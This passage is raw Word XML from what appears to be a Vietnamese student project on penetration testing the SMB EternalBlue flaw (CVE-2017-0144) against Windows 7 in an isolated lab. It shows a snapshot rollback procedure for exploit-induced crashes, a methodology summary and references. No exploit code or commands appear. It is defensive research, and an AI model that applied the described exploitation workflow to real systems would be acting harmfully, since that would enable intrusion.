                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|        (S0_Clean, S1_Clean, S2_Clean, S3_Clean)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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|               BƯỚC 2: THỰC THI KỊCH BẢN KIỂM THỬ            |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|       Chạy Kỹ thuật 1 -&gt; Kỹ thuật 2 -&gt; Kỹ thuật 3 -&gt; KT 5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    Hệ thống có bị sự cố BSOD?   \</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">              \      (Crash nhân hệ điều hành)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CÓ   |               |   KHÔNG</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                       v               v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>+------------------------------+  +---------------------------+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>| BƯỚC 3A: QUY TRÌNH ROLLBACK  |  | BƯỚC 3B: GHI NHẬN KẾT QUẢ |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>| - Dừng tiến trình Metasploit |  | - Thu thập log phiên MSF  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>| - Đánh dấu: Cấp 4 = FAIL     |  | - Dừng bắt gói tệp .pcap  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>| - Khôi phục Snapshot sạch    |  | - Thu thập Firewall log   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>| - Kiểm tra sẵn sàng dịch vụ  |  | - Chuyển pha đối chứng    |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>+------------------------------+  +---------------------------+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E4DD6B4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="1B32925B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Sơ đồ 2.3: Quy trình quản lý trạng thái máy ảo và cơ chế khôi phục tức thời qua Snapshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E257429" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Trình tự thực hiện rollback khi phát sinh sự cố:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE6578E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ghi nhận sự cố:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Khi lệnh exploit gây màn hình xanh, ghi nhận mã dừng hệ thống (Bug Check Code), thời điểm phát sinh và đánh dấu kết quả thực nghiệm là </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>FAIL (KERNEL_CRASH)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B9DCCC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ngắt kết nối:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Lập tức dừng tiến trình kiểm thử trên máy Kali Linux để giải phóng các socket mạng đang mở.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D583B79" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Thực thi Rollback:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sử dụng chức năng quản lý snapshot của nền tảng ảo hóa khôi phục máy mục tiêu về trạng thái sạch tương ứng (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_0, S_1, S_2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_3</w:t>
      </w:r>
      <w:r>
        <w:t>). Thao tác này hoàn tất trong thời gian dưới 10 giây, đưa nhân hệ điều hành về trạng thái phân bổ bộ nhớ ban đầu không bị phân mảnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEE8818" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kiểm tra tính sẵn sàng (Pre-flight Check):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Thực hiện một phép kiểm tra ICMP Ping và kiểm tra cổng 445 từ trạm Client (VLAN 30) để xác nhận dịch vụ chia sẻ tệp đã phục hồi trước khi tiếp tục thực nghiệm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E7D338" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>TỔNG KẾT CHƯƠNG 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299EBE4C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Chương 2 đã hoàn thành toàn diện việc thiết kế và chuẩn hóa mô hình thực nghiệm kiểm thử an ninh giao thức SMB theo phương pháp luận khoa học chặt chẽ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F730DE" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Xác lập phương pháp luận chuỗi nhân quả (Causal-Chain Model), mô hình hóa đường tấn công CVE-2017-0144 thành hệ thống 6 tiền điều kiện hình thức </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>(R, S, D, V, E, C)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và làm rõ nguyên lý bẻ gãy phòng thủ tại các mắt xích logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A8486" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Xây dựng kiến trúc mạng phân đoạn doanh nghiệp mô phỏng gồm 3 VLAN (Server, Pentest, User) kết nối qua Tường lửa/UTM làm điểm định tuyến và </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>kiểm soát tập trung, ngắt hoàn toàn kết nối Internet thực nhằm loại trừ rủi ro phát tán mã độc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335AD449" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Chuẩn hóa máy trạng thái đơn biến 4 nấc snapshot (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_0 \to S_1 \to S_2 \to S_3</w:t>
      </w:r>
      <w:r>
        <w:t>) trên cùng một hệ thống Windows 7 SP1 x64 mục tiêu, đồng thời tích hợp trạm Windows Client tại VLAN 30 làm đối chứng nghiệp vụ dương tính, khẳng định tính toàn vẹn của dịch vụ trong suốt quá trình hardening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8EB290" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>Chuẩn hóa 5 kỹ thuật đo lường theo mô hình bạch hộp 10 thành phần; thiết lập tiêu chuẩn đánh giá Cấp độ 4 nghiêm ngặt (chỉ công nhận khi thực thi mã thành công, loại trừ BSOD/Crash khỏi kết quả thành công); thiết kế trước Ma trận bằng chứng thu thập đa nguồn (Evidence Matrix) và cơ chế rollback snapshot an toàn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03650114" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Toàn bộ khung kiến trúc, hệ thống tiền điều kiện và các kỹ thuật đo lường được chuẩn hóa trong Chương 2 là căn cứ phương pháp luận duy nhất để tiến hành các lượt chạy thực nghiệm và thu thập số liệu đối chứng chi tiết trong Chương 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E709AC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6AE82C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] G. Weidman, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Penetration Testing: A Hands-On Introduction to Hacking</w:t>
      </w:r>
      <w:r>
        <w:t>. San Francisco, CA: No Starch Press, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2659ADE9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2] C. McNab, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Network Security Assessment: Know Your Network</w:t>
      </w:r>
      <w:r>
        <w:t>, 3rd ed. Sebastopol, CA: O'Reilly Media, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597199E3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[3] P. Yosifovich, D. A. Solomon, and A. Ionescu, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Windows Internals, Part 1: System architecture, processes, threads, memory management, and more</w:t>
      </w:r>
      <w:r>
        <w:t>, 7th ed. Redmond, WA: Microsoft Press, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762975EC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>[4] Microsoft, "Microsoft Security Bulletin MS17-010 - Critical," Microsoft Learn / Security TechCenter, Mar. 2017. [Online]. Available: https://learn.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9DE47C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>[5] Rapid7, "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption," Rapid7 Exploit Database, 2017. [Online]. Available: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5753255D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[6] D. Kennedy, J. O'Gorman, D. Kearns, and M. Aharoni, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Metasploit: The Penetration Tester's Guide</w:t>
      </w:r>
      <w:r>
        <w:t>, 2nd ed. San Francisco, CA: No Starch Press, 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCD4318" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[7] Microsoft, "Detect, enable, and disable SMBv1, SMBv2, and SMBv3 in Windows," Microsoft Learn, 2025. [Online]. Available: https://learn.microsoft.com/en-us/windows-server/storage/file-server/troubleshoot/detect-enable-and-disable-smbv1-v2-v3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C93AF2E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[8] G. Lyon, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Vulnerability Scanning</w:t>
      </w:r>
      <w:r>
        <w:t>. Sunnyvale, CA: Insecure.Com LLC, 2009.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B47225" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>[9] P. Calderon and Nmap Project, "smb-vuln-ms17-010.nse Script Source Code," Nmap Project, 2017. [Online]. Available: https://svn.nmap.org/nmap/scripts/smb-vuln-ms17-010.nse</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DB6619" w:rsidSect="00034616">
      <w:headerReference w:type="default" r:id="rId8"/>
      <w:footerReference w:type="default" r:id="rId9"/>
      <w:pgSz w:w="11909" w:h="16834"/>
      <w:pgMar w:top="1987" w:right="1138" w:bottom="1699"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DD94" w14:textId="77777777" w:rsidR="00872A6F" w:rsidRDefault="00872A6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7684B019" w14:textId="77777777" w:rsidR="00872A6F" w:rsidRDefault="0087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194F" w14:textId="12DC9A7A" w:rsidR="00DB6619" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="464646"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="464646"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="464646"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="009A434D">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="464646"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t>6</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="46464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2080" w14:textId="77777777" w:rsidR="00872A6F" w:rsidRDefault="00872A6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5CEC0A89" w14:textId="77777777" w:rsidR="00872A6F" w:rsidRDefault="00872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998A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:t>ĐỒ ÁN CHUYÊN NGÀNH: KIỂM THỬ LỖ HỔNG SMB TRÊN WINDOWS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298394">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1874266647">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="688678806">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="577635652">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="636909787">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="527716158">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="237637208">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1709841099">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="652417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7DD"/>
    <w:rsid w:val="00872A6F"/>
    <w:rsid w:val="009A434D"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00C34B24"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00DB66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F2573"/>
  <w14:defaultImageDpi w14:val="330"/>
  <w15:docId w15:val="{E464502A-64BE-47EA-95A3-4BFA63E50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color w:val="1E293B"/>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53</Pages>
  <Words>14853</Words>
  <Characters>84664</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tien</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-12T03:12:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>